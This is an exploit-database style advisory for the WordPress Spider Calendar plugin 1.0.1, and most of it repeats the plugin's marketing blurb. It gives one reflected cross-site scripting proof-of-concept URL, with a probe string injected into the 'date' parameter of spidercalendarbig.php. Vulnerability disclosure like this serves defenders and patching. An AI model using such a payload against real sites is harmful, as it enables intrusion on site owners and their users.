Exploit Title: Wordpress spider calendar Plugin Multiple Vulnerabilities Dork: N/A Date: [02-10-2012] Author: Daniel Barragan "D4NB4R" Twitter: @D4NB4R Vendor: http://wordpress.org/extend/plugins/spider-calendar/ Version: 1.0.1 License: Non-Commercial Demo: http://wpdemo.web-dorado.com/spider-calendar/ Download: http://downloads.wordpress.org/plugin/spider-calendar.zip Tested on: [Linux(bt5)-Windows(7ultimate)] Especial greetz: _84kur10_, nav, dedalo, ksha, shine, p0fk, the_s41nt Descripcion Plugin Wordpress: Spider Calendar is a highly configurable plugin which allows you to have multiple organized events in a calendar. This plugin is one of the best WordPress Calendar available in WordPress Directory. If you have problem with organizing your events and displaying them in a calendar format, then Spider Calendar is the best solution. Maybe you just want to have a quick look at your calendar to remind yourself about the future appointments? It will be great if calendar extension will be able to show all events, display them in a widget as a beautiful and customizable calendar on your website. Spider WordPress Calendar is an extraordinary user friendly calendar. Exploit: XSS : Cross-site scripting http://127.0.0.1/wp-content/plugins/Calendar/front_end/spidercalendarbig.php?calendar_id=1&cur_page_url=&date=D4NB4R'"()%26%251